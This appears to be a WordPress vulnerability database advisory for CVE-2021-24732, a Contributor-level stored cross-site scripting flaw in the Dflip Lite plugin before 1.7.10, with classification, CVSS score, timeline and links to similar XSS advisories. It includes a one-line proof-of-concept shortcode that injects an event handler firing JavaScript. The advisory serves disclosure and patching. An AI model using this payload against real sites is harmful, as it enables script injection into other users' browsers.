Dflip Lite < 1.7.10 – Contributor+ Stored Cross-Site Scripting | CVE 2021-24732

Description

The plugin does not escape the class attribute of its shortcode before outputting it back in an attribute, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks

Proof of Concept

[dflip class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)//']

Affects Plugins

3d-flipbook-dflip-lite

Fixed in 1.7.10

References

CVE

CVE-2021-24732

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

6.8 (medium)

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

9425a9b2-e9b8-41f5-a3ca-623b6da0297c

Timeline

Publicly Published

2021-09-15 (about 4 years ago)

Added

2021-09-15 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2024-04-24

Title

Photo Gallery - GT3 Image Gallery & Gutenberg Block Gallery < 2.7.7.22 - Authenticated (Author+) Cross-Site Scripting

Published

2024-03-25

Title

Fancy Comments WordPress < 1.2.15 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Published

2015-04-20

Title

Digital Store < 1.3.3 - Unspecified XSS

Published

2025-03-20

Title

Rizzi Guestbook <= 4.0.1 - Reflected Cross-Site Scripting

Published

2024-12-05

Title

Slider & Popup Builder by Depicter – Add Image Slider, Carousel Slider, Exit Intent Popup, Popup Modal, Coupon Popup, Post Slider Carousel < 3.2.2- Authenticated (Author+) Stored Cross-Site Scripting